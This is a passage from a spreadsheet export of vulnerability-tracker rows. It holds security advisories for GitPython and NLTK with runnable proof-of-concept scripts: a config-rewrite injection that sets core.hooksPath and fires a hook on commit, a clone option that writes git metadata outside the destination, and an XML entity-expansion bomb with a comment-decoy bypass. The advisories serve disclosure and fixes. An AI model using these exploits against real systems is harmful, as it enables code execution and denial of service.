That guard is applied only on the write-argument surface. It is never consulted for values that entered `GitConfigParser._sections` via `_read()` — i.e. values that came from parsing an on-disk config file. And `_read()` legitimately supports standard, spec-compliant git config syntax for multi-line values: a quoted value that is not closed on the same physical line continues onto the next physical line (git's own backslash-continuation syntax), and `string_decode()` (`.decode('unicode_escape')`) decodes a literal two-character `\n` **escape sequence** inside such a value into a real embedded LF character in the resulting Python string. No raw control byte is ever written to disk to achieve this — it's the same syntax real `git` itself uses and accepts.
The bug is in what happens when that `GitConfigParser` is later **flushed**: `write_section()` (line ~694) calls the *unsafe* `self._value_to_string(v)` — not `_value_to_string_safe()` — and "handles" any embedded newline in the value with `.replace("\n", "\n\t")` (line 708), emitting a bare, unquoted `&lt;real newline&gt;&lt;tab&gt;` in the output file with no re-quoting and no backslash-continuation marker. Real git does **not** treat an indentation-only continuation the way GitPython's writer assumes — a value only continues across physical lines when the *previous* line ends in a literal `\` immediately before the newline. So the moment `write_section()` re-serializes a previously-decoded multi-line value this way, the second half of that value becomes an **independent, new config line** the next time anyone (GitPython or real `git`) parses the file. If an attacker chooses the dormant value's content to be `&lt;anything&gt;\nhooksPath = &lt;attacker path&gt;`, that second line is parsed as a brand-new `core.hooksPath = &lt;attacker path&gt;` directive — live, real Git configuration, not a value.
`core.hooksPath` is honored by essentially every hook-firing git operation (`commit`, `checkout`, `merge`, `push`, `rebase`, ...), giving arbitrary code execution the next time the host application performs any hook-triggering operation.
## Root cause
`GitConfigParser`'s injection guard is asymmetric: it hardens every *write-argument* entry point (the fix for the four sibling GHSAs) but never hardens the **read → corrupt-on-rewrite round trip**. A value that is 100% legitimate and inert as parsed from disk becomes a newly-injected directive purely through GitPython's own broken re-serialization logic (`write_section()` using the unsafe value-to-string path plus a continuation scheme real git doesn't recognize). The `c417af46` commit message even states its intent explicitly: *"This preserves existing read behavior for config files that already contain multiline values while preventing GitPython from writing new unsafe values"* — i.e. the maintainers consciously scoped the fix to the write-argument surface and did not address what happens when an already-resident multi-line value gets rewritten.
## Exploit path
1. A `.git/config` (or any file merged into it via `[include]`, see below) already contains a dormant, syntactically-legitimate multi-line quoted value, e.g.:
   ```
   [core]
   	zzz = "A\nhooksPath = ../evil-hooks\
   "
   ```
   No raw `\r`, `\n`, or NUL byte appears on disk — this is standard git quoting + backslash-continuation. Real `git config --get core.hookspath` returns nothing at this point (inert); `git config --get core.zzz` returns the decoded string `A\nhooksPath = ../evil-hooks`, identically to GitPython's own reader.
2. The host application opens this repo with GitPython (`git.Repo(path)`, `read_only=False` implicitly for a normal `config_writer()` use) and performs **any** single, unrelated, legitimate config write on the same `GitConfigParser` instance — e.g. `repo.config_writer().set_value("user", "name", "Test User")`. This is one of the most ordinary operations a GitPython-based tool performs.
3. `GitConfigParser._write()`/`write_section()` re-serializes every resident value, including the dormant `zzz` entry, using the unsafe path. The file on disk now contains, verbatim:
   ```
   [core]
   	...
   	zzz = A
   	hooksPath = ../evil-hooks
   ```
4. Real `git config --get core.hookspath` now returns `../evil-hooks` — a key that did not exist before step 2, created purely by GitPython's own write.
5. The next hook-firing git operation (e.g. `git commit`) executes `../evil-hooks/pre-commit` (or whatever hook name the operation looks for), i.e. arbitrary attacker-chosen code execution.
## Impact
Arbitrary code execution, on par with (and more directly triggered than) the already-accepted, High-severity `GHSA-mv93-w799-cj2w`/`GHSA-v87r-6q3f-2j67` "Newline injection... enables RCE via core.hooksPath" advisories, and requiring **no unsafe caller argument at all** — only an attacker-influenced config file plus one ordinary, unrelated write.
## Preconditions
- A config file GitPython opens read-write already contains an attacker-chosen, syntactically-valid multi-line value shaped like `&lt;anything&gt;\n&lt;injected-key&gt; = &lt;injected-value&gt;`. Realistic delivery:
  1. **Pre-existing `.git` directory shipped with a repository** — vendored/template repos, CI workspace/layer caches that preserve `.git`, "repo" tarball/zip distributions that include `.git/config`. The poisoned value sits directly in `.git/config`.
  2. **The documented shared-config `[include]` pattern** (`[include] path = ../&lt;repo-tracked-file&gt;`, pointing at a file inside the working tree) — `GitConfigParser.read()` merges included files' sections into the same `_sections` dict used for writing, so a malicious public repository can ship the poisoned value inside a normal tracked file and have it activated the first time any GitPython-based tool performs any unrelated config write after clone (this requires the victim's own `.git/config` to already reference the include, e.g. via project setup tooling that adds `include.path`).
  3. **Any host application that opens an attacker-influenced config file for read-write and later performs a legitimate write** — the exact trust-boundary the maintainers already accepted as realistic for `GHSA-v87r-6q3f-2j67` (their writeup cites MLRun's `project.push()`).
- No authentication/role requirement inside GitPython itself.
## Evidence
- `git/config.py:460` (`string_decode`), invoked at `git/config.py:519` and `:541` inside `_read()`'s multi-line handling — decodes `unicode_escape`, turning a literal `\n` escape into a real embedded LF.
- `git/config.py:~694-712` (`_write()`/`write_section()`) — uses `self._value_to_string(v)` (unsafe variant) and `.replace("\n", "\n\t")` with no re-quoting.
- `c417af46` (the CR/LF/NUL guard commit) touches only the setter path and explicitly states it preserves existing *read* behavior for multi-line values, per its own commit message.
- `git log -S"string_decode"`, `-S"write_section"`, `-S'replace("\n", "\n\t")'` on `git/config.py` show these code paths have only ever been touched by non-security formatting/refactor commits (`a5fc1d86`, `b825dc74`, `cb68eef0`, `21ec5299`), never by a security fix.
- PoC (`gitpython-002-poc.py`, embedded below) reproduces the full chain end-to-end against this exact checkout: dormant value → one unrelated `config_writer()` write → `core.hookspath` becomes live per real `git config --get` → a subsequent `git commit` executes the injected hook and writes a benign marker file.
## False-positive check (adversarial re-read)
- **Is this just a repeat of the four already-fixed config-injection GHSAs?** No — all four require the *caller* to pass a Python string containing a raw control character or forbidden syntax character as an argument to a setter; all four are now blocked by `UNSAFE_CONFIG_CHARS_RE`/`VALID_CONFIG_OPTION_NAME_RE`/the section quote-state-machine. This finding requires no such caller argument: the payload is smuggled entirely inside a config *file* using standard, valid git escaping that the guard never inspects, and only becomes dangerous through GitPython's own unguarded re-serialization of a value it already holds. Confirmed via `_known-advisories.json` (26 entries, none withdrawn) — none describe this read→corrupt-on-rewrite mechanism.
- **Does real git actually round-trip this value safely (i.e. is this a GitPython-only bug, not a "normal" file)?** Yes, confirmed empirically: after the same crafted `.git/config` is rewritten by *real* `git config user.name Test2` (a control test), the multi-line `zzz` entry is preserved byte-for-byte in its original quoted/continuation form — only GitPython's writer corrupts it.
- **Is there a guard elsewhere that would catch the resulting bare `hooksPath = ...` line before it's trusted?** No — once on disk, it is indistinguishable from a directive the user set intentionally; `core.hooksPath` is honored unconditionally by git's hook-invocation machinery.
- **Does this require an unrealistic precondition?** The precondition (a config file with attacker-influenced content, later legitimately rewritten) mirrors the exact threat model the maintainers already treated as realistic and fixed for `GHSA-v87r-6q3f-2j67`.
- Verdict: no concrete blocker found. **CONFIRMED** — reproduced independently end-to-end (dormant value in place → benign unrelated `config_writer()` write → `core.hookspath` live per real git → hook fires on `git commit`, marker file written).
## Remediation
Either (a) make `write_section()`/`_write()` use `_value_to_string_safe()` (or equivalent re-quoting) for **every** resident value, including those that originated from `_read()`, so an embedded newline is always re-emitted as a properly quoted+backslash-continued value rather than a bare new line, or (b) reject/neutralize embedded control characters in values at read time before they can reach `_sections` at all if the parser is opened in `read_only=False` mode, or (c) canonicalize output using git's own `git config --file &lt;path&gt; --replace-all` semantics instead of a hand-rolled writer. Option (a) is the most surgical fix and matches the spirit of `_value_to_string_safe()` already used on the setter path.
## Confidence
High. Root cause independently re-derived and confirmed by direct code reading; full exploit chain (dormant value → benign unrelated write → live `core.hookspath` → hook execution with a benign marker) reproduced twice, independently, against the current HEAD.
## Proof-of-Concept source (`gitpython-002-poc.py`)
```python
#!/usr/bin/env python3
"""
GITPYTHON-002 PoC: a dormant, legitimately-encoded multi-line git-config value
(standard quoted + backslash-continuation syntax, containing an escaped "\\n"
that decodes to a real embedded newline in memory) is corrupted into a NEW,
live config key the moment GitConfigParser re-serializes it during any
unrelated write. If the smuggled second "line" looks like
"hooksPath = &lt;attacker path&gt;", it becomes a real, active core.hooksPath after
one unrelated GitPython config write, and fires attacker code on the next
hook-triggering git operation (e.g. `git commit`).
This is CWE-88/CWE-94 style argument/config injection, but via the READ path
(a config file GitPython parses and later rewrites), not via a Python kwarg
argument -- distinct from the already-fixed GHSA-mv93-w799-cj2w /
GHSA-v87r-6q3f-2j67 / GHSA-3rp5-jjmw-4wv2 / GHSA-jm78-9fvv-mhgr, which all
guard the setter-argument surface only.
Run:
  PYTHONPATH="&lt;repo&gt;:&lt;repo&gt;/gitdb:&lt;repo&gt;/smmap" python3 gitpython-002-poc.py &lt;workdir&gt;
Benign: only writes/reads inside &lt;workdir&gt;. The "malicious" hook just writes a
marker file; no destructive/exfiltrating payload. Exits non-zero and prints
"NOT VULNERABLE" if the corruption / hook does not fire.
"""
import os
import subprocess
import sys
def main():
    workdir = sys.argv[1] if len(sys.argv) &gt; 1 else "/tmp/gitpython-002-poc"
    repo_dir = os.path.join(workdir, "repo")
    hooks_dir = os.path.join(workdir, "evil-hooks")
    marker = os.path.join(workdir, "PWNED_MARKER.txt")
    for p in (repo_dir, hooks_dir):
        os.makedirs(p, exist_ok=True)
    if os.path.exists(marker):
        os.remove(marker)
    subprocess.run(["git", "init", "-q", "-b", "main", repo_dir], check=True)
    subprocess.run(["git", "-C", repo_dir, "config", "user.email", "test@example.com"], check=True)
    subprocess.run(["git", "-C", repo_dir, "config", "user.name", "Test"], check=True)
    # Rewrite .git/config with a dormant, 100%-valid multi-line quoted value
    # inside [core] (before any other section). No raw CR/LF/NUL byte is
    # written to disk here -- this is standard git config quoting +
    # backslash-line-continuation, decoded by both real git and GitConfigParser
    # into the Python string 'A\nhooksPath = ../evil-hooks'.
    cfg_path = os.path.join(repo_dir, ".git", "config")
    with open(cfg_path) as f:
        original = f.read()
    poisoned_entry = '\tzzz = "A\\nhooksPath = ../evil-hooks\\\n"\n'
    # Insert right after the [core] header line so it lives in the same section.
    new_config = original.replace("[core]\n", "[core]\n" + poisoned_entry, 1)
    with open(cfg_path, "w") as f:
        f.write(new_config)
    # Confirm it's inert per real git before touching GitPython.
    pre = subprocess.run(
        ["git", "-C", repo_dir, "config", "--get", "core.hookspath"],
        capture_output=True, text=True,
    )
    if pre.returncode == 0:
        print("SETUP ERROR: core.hookspath already set before GitPython touched anything")
        sys.exit(2)
    # Malicious hook: benign marker only.
    hook_path = os.path.join(hooks_dir, "pre-commit")
    with open(hook_path, "w") as f:
        f.write('#!/bin/sh\necho "PWNED-VIA-GITPYTHON-CONFIG-INJECTION" &gt; "%s"\nexit 0\n' % marker)
    os.chmod(hook_path, 0o755)
    import git  # gitpython under test
    repo = git.Repo(repo_dir)
    before = repo.config_reader().get_value("core", "zzz")
    print("core.zzz before any GitPython write =", repr(before))
    # ONE totally unrelated, benign write -- this is the only "attacker-adjacent"
    # action required, and it is something virtually every GitPython consumer
    # does routinely (setting an option, adding a remote, updating a branch's
    # tracking config, ...).
    with repo.config_writer() as cw:
        cw.set_value("user", "name", "Test User")
    post = subprocess.run(
        ["git", "-C", repo_dir, "config", "--get", "core.hookspath"],
        capture_output=True, text=True,
    )
    if post.returncode != 0:
        print("NOT VULNERABLE: core.hookspath still absent after the unrelated write")
        sys.exit(1)
    injected_path = post.stdout.strip()
    print("core.hookspath is now LIVE after one unrelated write:", injected_path)
    # Trigger the hook with a normal commit to prove it fires.
    with open(os.path.join(repo_dir, "file2.txt"), "w") as f:
        f.write("change\n")
    subprocess.run(["git", "-C", repo_dir, "add", "file2.txt"], check=True)
    subprocess.run(
        ["git", "-C", repo_dir, "-c", "user.email=t@example.com", "-c", "user.name=T",
         "commit", "-q", "-m", "trigger hook"],
        check=True,
    )
    if os.path.isfile(marker):
        with open(marker) as f:
            content = f.read().strip()
        print("VULNERABLE: hook fired, marker content =", content)
        sys.exit(0)
    else:
        print("NOT VULNERABLE: hook did not fire")
        sys.exit(1)
if __name__ == "__main__":
    main()
```</t>
        </is>
      </c>
      <c r="T1042" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78676</t>
        </is>
      </c>
    </row>
    <row r="1043">
      <c r="A1043" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1043" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1043" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78677</t>
        </is>
      </c>
      <c r="D1043" s="5" t="inlineStr"/>
      <c r="E1043" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1043" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1043" s="5" t="inlineStr"/>
      <c r="H1043" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I1043" s="5" t="inlineStr"/>
      <c r="J1043" s="5" t="inlineStr"/>
      <c r="K1043" s="5" t="inlineStr"/>
      <c r="L1043" s="5" t="inlineStr">
        <is>
          <t>PyPI:gitpython</t>
        </is>
      </c>
      <c r="M1043" s="5" t="inlineStr">
        <is>
          <t>3.1.59</t>
        </is>
      </c>
      <c r="N1043" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1043" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1043" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q1043" s="5" t="inlineStr"/>
      <c r="R1043" s="5" t="inlineStr"/>
      <c r="S1043" s="5" t="inlineStr">
        <is>
          <t>- **CWE:** CWE-73 (External Control of File Name or Path) / CWE-22 (Path Traversal, in the "escapes intended base directory" sense)
- **Affected component:** `git/repo/base.py`, `Repo.unsafe_git_clone_options` (class attribute, lines 153-165) and `Repo._clone()` (lines 1477-1520), reached via the public `Repo.clone_from()` (line 1626) and `Repo.clone()` (line 1567) APIs.
- **Affected version:** GitPython at HEAD (`9729ed3b948f2bde09f1f188c5311e172212b67e`, 2026-08-05, VERSION `3.1.58`)
## Reachability
`Repo.clone_from(url, to_path, **kwargs)` (and `Repo.clone()`) forward arbitrary keyword arguments to the underlying `git clone` invocation. Before forwarding, GitPython builds a candidate option list from the kwargs (`Git._option_candidates`) and checks it against a denylist, `Repo.unsafe_git_clone_options`, via `Git.check_unsafe_options()` — *unless* the caller passes `allow_unsafe_options=True`. This denylist mechanism is exactly the guard that the last ~16 published GHSAs against this repo (2026-07-12 → 2026-08-05) have repeatedly found incomplete or bypassable for other options (`--template`, `--upload-pack`, `--config`, `--exec`, `--output`, `--index-output`, `--pathspec-from-file`, etc.).
`git clone` also accepts `--separate-git-dir=&lt;path&gt;`, which redirects the repository's entire `.git` metadata directory to an **arbitrary, caller-controlled filesystem path**, leaving only a gitlink text file (`gitdir: &lt;path&gt;`) at the intended destination. This is the exact same primitive already recognized as unsafe by GitPython's own code: `Repo.unsafe_git_init_options` (line 145-150) blocks `--separate-git-dir` for `Repo.init()`, with the comment *"Redirects the repository metadata to a caller-controlled path"*. The `Repo._clone()`/`clone()`/`clone_from()` docstring (line 1450-1452) is even more explicit:
```
:param allow_unsafe_options:
    Allow unsafe options to be used, such as ``--template`` and
    ``--separate-git-dir``.
```
i.e. the maintainers' own documentation states that `allow_unsafe_options=False` (the default) is supposed to block `--separate-git-dir` for clone. But **`Repo.unsafe_git_clone_options` does not contain it**:
```python
unsafe_git_clone_options = [
    "--upload-pack",
    "-u",
    "--config",
    "-c",
    "--template",
    "--bundle-uri",
]
```
So any application that forwards a `separate_git_dir` (or `separate-git-dir`) kwarg into `Repo.clone_from()` / `Repo.clone()` — e.g. a CI/build service, a Git-hosting proxy, or any tool that exposes a subset of clone options to a client, the exact threat model already accepted for the sibling `--template`/`--upload-pack`/`--config` entries in this same list — gets **no protection at all** for `--separate-git-dir`, even with the default `allow_unsafe_options=False`.
## Root cause
Parity gap between two sibling denylists that guard the same underlying primitive (arbitrary redirection of git metadata storage): `unsafe_git_init_options` correctly lists `--separate-git-dir`; `unsafe_git_clone_options`, covering the same option on a different git subcommand that also accepts it, does not — despite the function's own docstring claiming otherwise. This is the same "denylist omits an equally-dangerous sibling option" pattern already responsible for `GHSA-539m-9xh6-q6rr` (`archive` denylist missing `--add-file`/`--add-virtual-file`) and `GHSA-6p8h-3wgx-97gf` (`clone` denylist missing `--template`, since fixed).
## Exploit path
1. Attacker-controlled input reaches a `separate_git_dir=...` (or equivalently `"separate-git-dir"`) keyword argument passed into `Repo.clone_from()` / `Repo.clone()` by the host application, with `allow_unsafe_options` left at its default `False`.
2. `Git._option_candidates()` renders this as `--separate-git-dir` and `Git.check_unsafe_options()` checks it against `Repo.unsafe_git_clone_options` — no match, no `UnsafeOptionError` raised.
3. `Git.transform_kwargs()` renders the same kwarg into the real command line as `--separate-git-dir=&lt;attacker path&gt;` and GitPython executes `git clone -v --separate-git-dir=&lt;attacker path&gt; -- &lt;url&gt; &lt;dest&gt;` via `subprocess` (no shell).
4. `git` itself creates the full repository metadata tree (`config`, `description`, `HEAD`, `hooks/`, `index`, `objects/`, `refs/`, `packed-refs`, `logs/`) at the attacker-specified path — which can be **any path outside the intended clone destination** that the process has permission to create — and leaves a gitlink file at the intended destination pointing to it.
## Impact
Arbitrary directory/file creation at a path fully controlled by the attacker (bounded only by filesystem permissions of the process running GitPython), matching the impact class of the already-published, High-severity `GHSA-hmq2-w58f-27jc` ("Arbitrary Git Repository Creation Outside the Working Tree", CVSS 8.2). Concretely:
- Planting a git repository structure (including a `hooks/` directory) at an attacker-chosen location outside the sandboxed clone destination the calling application intended to confine the operation to.
- If the attacker-chosen path collides with an existing directory the process can write into (e.g. another repository's `.git`, a shared cache path, a predictable temp location), the clone silently populates/overwrites `config`, `HEAD`, `hooks/*`, `refs/*`, `packed-refs`, and `index` there — an integrity violation of a resource outside the intended destination.
- Combined with any later operation that runs `git` against that redirected/colliding directory (common in CI/build systems that reuse or predict working-directory layouts), this can escalate to hook execution, matching the RCE class already accepted for `--template` in `GHSA-9rj7-rf2p-w77r`.
## Preconditions
- The calling application forwards a caller-influenced value into a `separate_git_dir` kwarg of `Repo.clone_from()`/`Repo.clone()` (or into the `multi_options` list as a raw `--separate-git-dir=...` token) without itself validating/rejecting it, and does not pass `allow_unsafe_options=True` intentionally. This is the identical trust model GitPython's own denylist already defends for `--template`/`--upload-pack`/`--config`/`--bundle-uri` on the very same code path — i.e. this option was clearly meant to be covered by the same guard and was simply omitted.
- No authentication/role requirement inside GitPython itself; the vulnerable code runs the moment the host application calls the API with the option present.
## Evidence
- `git/repo/base.py:145-151` — `unsafe_git_init_options` includes `"--separate-git-dir"` with the comment "Redirects the repository metadata to a caller-controlled path".
- `git/repo/base.py:153-165` — `unsafe_git_clone_options` (the list actually enforced on `_clone`) does **not** include `"--separate-git-dir"`.
- `git/repo/base.py:1450-1452` — docstring of `clone_from`/`clone` explicitly documents `--separate-git-dir` as one of the options `allow_unsafe_options` is supposed to gate.
- `git/repo/base.py:1495-1518` — `_clone()` special-cases `separate_git_dir` only to `Git.polish_url()` it (path normalization for URL-like values), then runs it through `Git.check_unsafe_options(options=..., unsafe_options=cls.unsafe_git_clone_options)` — which, per the list above, does not flag it.
- PoC (`gitpython-001-poc.py`, embedded below) run against this exact checkout confirms the option reaches the real `git clone` subprocess unguarded and creates a full git directory outside the destination path, with `allow_unsafe_options` at its default `False`.
## False-positive check (adversarial re-read)
- **Is there a value-level check that would still stop this?** No — `check_unsafe_options` only inspects option *names* (via `_canonicalize_option_name`) against the denylist; it performs no filesystem/path validation on `separate_git_dir`'s value, and no other guard in `_clone()` touches this kwarg besides the `Git.polish_url()` normalization (which does not reject arbitrary paths).
- **Is `--separate-git-dir` perhaps a no-op or safely sandboxed for `clone` specifically (unlike `init`)?** No — confirmed empirically: the option reaches the real `git` binary unmodified and git honors it exactly as documented, writing the full metadata tree to the given path.
- **Could this be the exact bug already covered by one of the 26 published GHSAs?** Checked all 26 entries in `_known-advisories.json` (Filter 0): `GHSA-9rj7-rf2p-w77r` covers `--template` in `Repo.init`; `GHSA-6p8h-3wgx-97gf` covers `--template` in clone (already fixed, present in `unsafe_git_clone_options`); `GHSA-hmq2-w58f-27jc` covers arbitrary repo creation via unvalidated **`.gitmodules` submodule names** (a different code path — `Submodule`, not `Repo.clone_from()` kwargs). None reference `--separate-git-dir` on the clone path. This is a distinct, currently-unpatched gap.
- **Does this require an unrealistic precondition?** The precondition (host app forwards a kwarg into `clone_from`/`clone`) is identical to the precondition already accepted by the maintainers for the sibling entries in the same list (`--template`, `--upload-pack`, `--config`, `--bundle-uri`) — i.e. it is the same threat model the guard exists to cover, just missing one entry.
- Verdict: no concrete blocker found. **CONFIRMED.**
## Remediation
Add `"--separate-git-dir"` (and its `-` alias if git ever adds one — currently there is none) to `Repo.unsafe_git_clone_options` in `git/repo/base.py`, matching `unsafe_git_init_options`. Since `Repo._clone()` already special-cases `separate_git_dir` for `Git.polish_url()` normalization, the fix is a one-line addition to the existing list, consistent with how `GHSA-6p8h-3wgx-97gf` added `--template` to the same list.
## Confidence
High. Root cause is a one-line, unambiguous omission the maintainers' own docstring contradicts; PoC reproduces cleanly and deterministically against the current HEAD; no plausible false-positive path found.
## Proof-of-Concept source (`gitpython-001-poc.py`)
```python
#!/usr/bin/env python3
"""
GITPYTHON-001 PoC: Repo.clone_from(separate_git_dir=...) is not in
unsafe_git_clone_options, so it reaches `git clone` unguarded and writes a
full git directory (config, hooks/, objects/, refs/, ...) to an
attacker-controlled path OUTSIDE the intended destination directory, with
allow_unsafe_options left at its default of False.
Run against the GitPython source tree under test, e.g.:
  PYTHONPATH="&lt;repo&gt;:&lt;repo&gt;/gitdb:&lt;repo&gt;/smmap" python3 gitpython-001-poc.py &lt;workdir&gt;
Benign: only writes/reads inside the given workdir. No destructive/exfiltrating
payload. Exits non-zero and prints "NOT VULNERABLE" if the guard blocks the option
or the write does not escape the destination directory.
"""
import os
import sys
import subprocess
def main():
    workdir = sys.argv[1] if len(sys.argv) &gt; 1 else "/tmp/gitpython-001-poc"
    src = os.path.join(workdir, "src")
    dest = os.path.join(workdir, "dest")
    sentinel_dir = os.path.join(workdir, "OUTSIDE_SENTINEL")
    target_gitdir = os.path.join(sentinel_dir, "redirected.git")
    for p in (src, dest, sentinel_dir):
        os.makedirs(p, exist_ok=True)
    # Minimal benign source repo to clone from.
    subprocess.run(["git", "init", "-q", "-b", "main", src], check=True)
    subprocess.run(["git", "-C", src, "config", "user.email", "test@example.com"], check=True)
    subprocess.run(["git", "-C", src, "config", "user.name", "Test"], check=True)
    with open(os.path.join(src, "file.txt"), "w") as f:
        f.write("hello\n")
    subprocess.run(["git", "-C", src, "add", "file.txt"], check=True)
    subprocess.run(["git", "-C", src, "commit", "-q", "-m", "init"], check=True)
    import git  # gitpython under test
    print("unsafe_git_clone_options =", git.Repo.unsafe_git_clone_options)
    assert "--separate-git-dir" not in git.Repo.unsafe_git_clone_options, (
        "guard now includes --separate-git-dir; PoC no longer applicable, target patched"
    )
    try:
        repo = git.Repo.clone_from(src, dest, separate_git_dir=target_gitdir)
    except git.exc.UnsafeOptionError as e:
        print("NOT VULNERABLE: blocked by UnsafeOptionError:", e)
        sys.exit(1)
    wrote_outside = os.path.isdir(os.path.join(target_gitdir, "hooks")) and os.path.isfile(
        os.path.join(target_gitdir, "config")
    )
    gitlink_points_outside = False
    with open(os.path.join(dest, ".git")) as f:
        gitlink = f.read().strip()
        gitlink_points_outside = target_gitdir in gitlink
    print("repo.git_dir =", repo.git_dir)
    print("wrote git directory outside dest (sentinel) =", wrote_outside)
    print("dest/.git gitlink points outside dest =", gitlink_points_outside)
    if wrote_outside and gitlink_points_outside:
        print("VULNERABLE: git directory created at attacker-controlled path "
              f"outside the clone destination: {target_gitdir}")
        sys.exit(0)
    else:
        print("NOT VULNERABLE: sentinel not observed")
        sys.exit(1)
if __name__ == "__main__":
    main()
```</t>
        </is>
      </c>
      <c r="T1043" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78677</t>
        </is>
      </c>
    </row>
    <row r="1044">
      <c r="A1044" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1044" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1044" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78681</t>
        </is>
      </c>
      <c r="D1044" s="5" t="inlineStr"/>
      <c r="E1044" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1044" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="G1044" s="5" t="inlineStr"/>
      <c r="H1044" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1044" s="5" t="inlineStr"/>
      <c r="J1044" s="5" t="inlineStr"/>
      <c r="K1044" s="5" t="inlineStr"/>
      <c r="L1044" s="5" t="inlineStr">
        <is>
          <t>PyPI:nltk</t>
        </is>
      </c>
      <c r="M1044" s="5" t="inlineStr">
        <is>
          <t>3.10.3</t>
        </is>
      </c>
      <c r="N1044" s="5" t="inlineStr">
        <is>
          <t>OSV</t>
        </is>
      </c>
      <c r="O1044" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="P1044" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="Q1044" s="5" t="inlineStr"/>
      <c r="R1044" s="5" t="inlineStr"/>
      <c r="S1044" s="5" t="inlineStr">
        <is>
          <t>Several XML parsing sites in NLTK still used `xml.etree.ElementTree` directly, which honours `&lt;!ENTITY&gt;` declarations in a document's internal DTD subset. A crafted document a few hundred bytes long can expand to megabytes in memory (each nesting level multiplies by ten), a denial-of-service.
Affected call sites (&lt;= 3.10.2):
- `nltk.chunk.named_entity.load_ace_file` — parses ACE annotation XML
- `nltk.internals.ElementWrapper` — converts any given string to an Element
- `nltk.downloader` — `Package.fromxml`, `Collection.fromxml`, `_find_collections`, `_find_packages`
libexpat 2.6.0 added an input-amplification cap, but it only engages above an activation threshold (~8 MiB output) and depends on whichever libexpat the interpreter links; builds against older libexpat have no cap at all. External entities are not resolved by ElementTree, so this is a memory-amplification DoS (CWE-776), not XXE/file disclosure.
This completes the earlier defusedxml adoption that these sites were missed by. Fix routes all of them through a new `nltk.xmlsec` module that refuses entity declarations, preferring `defusedxml` and falling back to a standard-library `xml.parsers.expat` pre-scan when defusedxml is absent.
---
## Attack demonstration
Reproducible PoC against a real affected entry point (`nltk.internals.ElementWrapper`). Every number below is captured output, not illustrative.
### 1. The amplification (vulnerable path: raw `xml.etree.ElementTree`)
A payload of a few hundred bytes expands to megabytes in memory. Each nesting level multiplies output by 10 while adding ~56 bytes of input:
| levels | input bytes | expanded bytes | factor |
|--------|-------------|----------------|--------|
| 3 | 218 | 10,000 | x45 |
| 4 | 274 | 100,000 | x364 |
| 5 | 330 | 1,000,000 | x3,030 |
| 6 | 386 | (libexpat 2.7.1 cap trips) | - |
The level-6 cap is **libexpat's**, not NLTK's: it only engages above an ~8 MiB activation threshold, and older libexpat builds (still shipped with many 3.10/3.11 interpreters) have no cap at all. Under the threshold — up to ~1 MB per parse here — expansion always succeeds.
```python
import xml.etree.ElementTree as ET
def bomb(levels):
    d = "\n".join(f'&lt;!ENTITY e{i} "{("&amp;e%d;"%(i-1))*10}"&gt;' for i in range(1, levels+1))
    return f'&lt;!DOCTYPE d [&lt;!ENTITY e0 "AAAAAAAAAA"&gt;{d}]&gt;&lt;d&gt;&amp;e{levels};&lt;/d&gt;'
ET.fromstring(bomb(5))   # -&gt; element whose .text is 1,000,000 chars
```
### 2. The patched entry point rejects it
```
&gt;&gt;&gt; from nltk.internals import ElementWrapper
&gt;&gt;&gt; ElementWrapper(bomb(5))
EntitiesForbidden: EntitiesForbidden(name='e0', ...)
```
### 3. Why a text-based screen is not enough
An entity declaration can hide behind a decoy `&lt;!DOCTYPE&gt;` in a prolog comment. Raw ElementTree still processes the real declaration and expands; a guard that walks the DOCTYPE text is fooled. The shipped guard re-parses with expat, so it is not:
```python
evil = '&lt;!-- &lt;!DOCTYPE x [ ] &gt; --&gt;&lt;!DOCTYPE d [&lt;!ENTITY a "PPPP..."&gt;]&gt;&lt;d&gt;&amp;a;&lt;/d&gt;'
```
```
raw ElementTree -&gt; EXPANDS ('PPPPPPPPPPPP...', 40 chars)
nltk.xmlsec     -&gt; REJECTED (EntitiesForbidden)
```
An earlier draft of the fallback that walked the text **was** bypassed by this and 4 similar payloads (decoy DOCTYPE in a PI, stray `]` inside a PI in the internal subset). All five are now regression tests.
### 4. Both back ends block it
`nltk.xmlsec` prefers `defusedxml` and falls back to a stdlib `xml.parsers.expat` pre-scan. Same payloads, defusedxml hidden to force the fallback:
```
stdlib fallback | billion-laughs               -&gt; REJECTED (EntitiesForbidden)
stdlib fallback | comment-decoy differential   -&gt; REJECTED (EntitiesForbidden)
```
Environment: python 3.13.7, libexpat 2.7.1. Confirmed identical amplification on python 3.10 (NLTK's floor).</t>
        </is>
      </c>
      <c r="T1044" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78681</t>
        </is>
      </c>
    </row>
    <row r="1045">
      <c r="A1045" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1045" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1045" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78682</t>
        </is>
      </c>
      <c r="D1045" s="5" t="inlineStr"/>
      <c r="E1045" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="F1045" s="5" t="inlineStr">
        <is>
